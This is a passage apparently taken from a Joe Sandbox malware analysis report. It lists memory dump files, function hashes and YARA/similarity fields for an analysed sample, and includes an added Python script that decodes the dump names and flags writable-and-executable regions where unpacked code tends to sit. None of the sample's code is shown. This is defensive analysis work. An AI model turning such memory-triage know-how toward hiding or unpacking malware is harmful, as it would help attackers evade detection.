                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 19754013ecfc2708b06270a7877657cabd85f2ad5d3214bda8c516553714b749
• Instruction ID: 365069dc00f1dee63c8e014dc82f0bb7b296d75bef17788fa3678e1a65205830
• Opcode Fuzzy Hash: 19754013ecfc2708b06270a7877657cabd85f2ad5d3214bda8c516553714b749
• Instruction Fuzzy Hash: 2B2260B3F515144BDB0CCB9DDCA27ECB2E3AFD8218B0E813DA40AE3345EA79D9158644
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 11f1d7a472e1aa9517abbc101caf3fd0561dadaa38d2c2268f3b732325ffde75
• Instruction ID: 10fda3c41033e17a3b1f6b1ce5f17e2e4bc8febb689617a67a29f8053cc4c330
• Opcode Fuzzy Hash: 11f1d7a472e1aa9517abbc101caf3fd0561dadaa38d2c2268f3b732325ffde75
• Instruction Fuzzy Hash: 83B13B32624605DFDB69CF2CC486B657BE0FF45364F258658E899CF2A1C335E982DB40
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_50000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 87ab57efed49c74a570a440db25cf65dab2c08a17c08d8b4547862366e29662a
• Instruction ID: f86c4540ceec5b85dbbe84404c14060efe8bf27869cd62093893356f52743fa9
• Opcode Fuzzy Hash: 87ab57efed49c74a570a440db25cf65dab2c08a17c08d8b4547862366e29662a
• Instruction Fuzzy Hash: ED81EC70A002458FEB15CF68D890BEFBBF2BB5A305F1442A9DC50A7353C7359989CBA0
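The "Memory Dump Source" entries above list the memory dumps (.sdmp) the analysis associates with this function: the source dump sits at 0x51000 inside an image whose offset is 0x50000, and the associated dumps cover the rest of the same process. The following Python is an added example, not part of the Joe Sandbox report or its tooling. It parses the dotted dump names, computes each dump's offset from the image base, and flags regions whose protection value allows both writing and execution, which is what a practitioner looks for when deciding which dumps to pull for the unpacked payload. The field decoding is an assumption inferred from the values visible in the listing: the fifth field is treated as a Windows PAGE_* protection constant (0x04, 0x40 and 0x80 appear above) and the seventh as a MEM_* allocation type (0x01000000 appears above); the other fields are kept raw and not interpreted. The dump names in the sample input are copied from the listing above.

```python
"""Decode Joe Sandbox .sdmp names listed under "Memory Dump Source".

Added example; not code from the Joe Sandbox report.  The meaning of the
protection and type fields is an ASSUMPTION inferred from the listed values.
"""
import re
from dataclasses import dataclass
from typing import List

# Windows memory-protection constants (winnt.h); assumed to decode field 5.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Windows allocation-type constants (winnt.h); assumed to decode field 7.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Eight dotted hex fields followed by ".sdmp"; fields 4 (base) may be 16 digits.
SDMP_RE = re.compile(r"^[0-9A-Fa-f]{8}(?:\.[0-9A-Fa-f]{8,16}){7}\.sdmp$")


@dataclass(frozen=True)
class Dump:
    name: str
    proc: int        # field 1: process index within the analysis
    base: int        # field 4: region base address (hex)
    protect: int     # field 5: assumed PAGE_* value
    mem_type: int    # field 7: assumed MEM_* value
    raw_fields: tuple  # every field, uninterpreted, for anything not decoded here

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def writable_and_executable(self) -> bool:
        # RWX or WCX pages are where unpacked code tends to land.
        return self.protect in (0x40, 0x80)


def parse_sdmp(name: str) -> Dump:
    """Split one .sdmp file name into its fields."""
    name = name.strip()
    if not SDMP_RE.match(name):
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    f = name[: -len(".sdmp")].split(".")
    return Dump(
        name=name,
        proc=int(f[0], 16),
        base=int(f[3], 16),
        protect=int(f[4], 16),
        mem_type=int(f[6], 16),
        raw_fields=tuple(f),
    )


def rva(d: Dump, image_base: int) -> int:
    """Offset of the dump inside the image (the report's "Offset: 00050000")."""
    return d.base - image_base


def wx_regions(names: List[str]) -> List[int]:
    """Sorted base addresses of dumps whose assumed protection is W+X."""
    return sorted(d.base for d in map(parse_sdmp, names) if d.writable_and_executable)


# Constructed sample input: a subset of the dump names listed in the report.
SAMPLE = [
    "00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp",
]
IMAGE_BASE = 0x50000  # "Offset: 00050000" from the Source File line


if __name__ == "__main__":
    for d in map(parse_sdmp, SAMPLE):
        flag = "W+X" if d.writable_and_executable else "   "
        print(f"{flag} base=0x{d.base:08x} rva=0x{rva(d, IMAGE_BASE):06x} "
              f"{d.protect_name:24} {d.type_name}")
```

The regular expression accepts the third field as hex even though it looks like a decimal counter, because nothing here depends on its meaning; if the assumed field layout turns out to differ from what Joe Sandbox documents, `raw_fields` still carries every value so the decoding can be adjusted without re-parsing.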
Memory Dump Source
• Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
• Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 985cc90037e8b2957063d3909e9056e67deb251bd8e455211bc0fb6eac4039df
                                                                                                                                                                                                                                • Instruction ID: 1ecaafc1cc18ae0182a1af1d098d7f9c08434c12991308d9a7b6472fdfa2dbd8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 985cc90037e8b2957063d3909e9056e67deb251bd8e455211bc0fb6eac4039df
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9118623F30C255B775C81AD8C172BEA5D2EBD825071F533AD826E7284E9A4DE23D290
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
